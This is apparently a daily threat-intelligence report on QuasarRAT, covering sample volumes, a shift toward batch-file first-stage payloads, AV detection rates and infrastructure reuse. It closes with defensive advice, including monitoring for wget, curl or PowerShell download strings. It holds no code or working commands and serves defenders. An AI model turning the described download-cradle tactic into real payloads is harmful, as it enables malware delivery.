Daily Summary
QuasarRAT activity remains stable with 11 new samples collected today against a 7-day average of 12, reflecting a minor 5% decline. No significant spike or drop in volume was observed, indicating ongoing low-to-moderate distribution by threat actors.
New Samples Detected
All 11 samples are Windows-compatible, with 9 portable executables (.exe) and 2 batch script files (.bat). The batch files suggest a shift toward script-based initial access payloads, potentially used to download the main RAT binary or execute persistence commands. The .exe samples show no unusual obfuscation patterns, relying on standard packing techniques.
Distribution Methods
The combination of .exe and .bat files points to phishing campaigns as the primary delivery vector. The .bat files may be attached directly to emails or hosted on compromised sites, executed manually by users. This contrasts with recent campaigns that exclusively used compiled executables, indicating a tactical diversification to bypass email attachment filters.
Detection Rate
Preliminary scans indicate that roughly 60-70% of current QuasarRAT samples are detected by major AV engines, with the .exe variants being caught at higher rates than the .bat files. The low detection of batch scripts is concerning, as they often evade signature-based detection due to their text-based nature and lack of embedded binary signatures.
C2 Infrastructure
No new C2 servers were identified today, and all 11 IOCs are newly observed hashes and filenames. This suggests attackers are reusing existing infrastructure while rotating payload hashes to avoid hash-based blocklists. Geographic patterns remain absent from available data.
7-Day Trend
Over the past week, QuasarRAT activity has been remarkably steady, with daily sample counts ranging from 10 to 14. There is no indication of an imminent campaign ramp-up or structural shift in tactics.
Security Analysis
A notable observation is the introduction of .bat file payloads alongside traditional .exe samples. This mirrors tactics seen in recent AsyncRAT campaigns, where attackers use script-based first-stage payloads to evade email gateways and EDR solutions. The .bat files likely contain download cradle commands or simple persistence mechanisms. Defensively, organizations should enable command-line logging and monitor for suspicious wget, curl, or PowerShell download strings in batch file execution. Blocking execution of .bat files from email attachments and Downloads folders is a practical recommendation.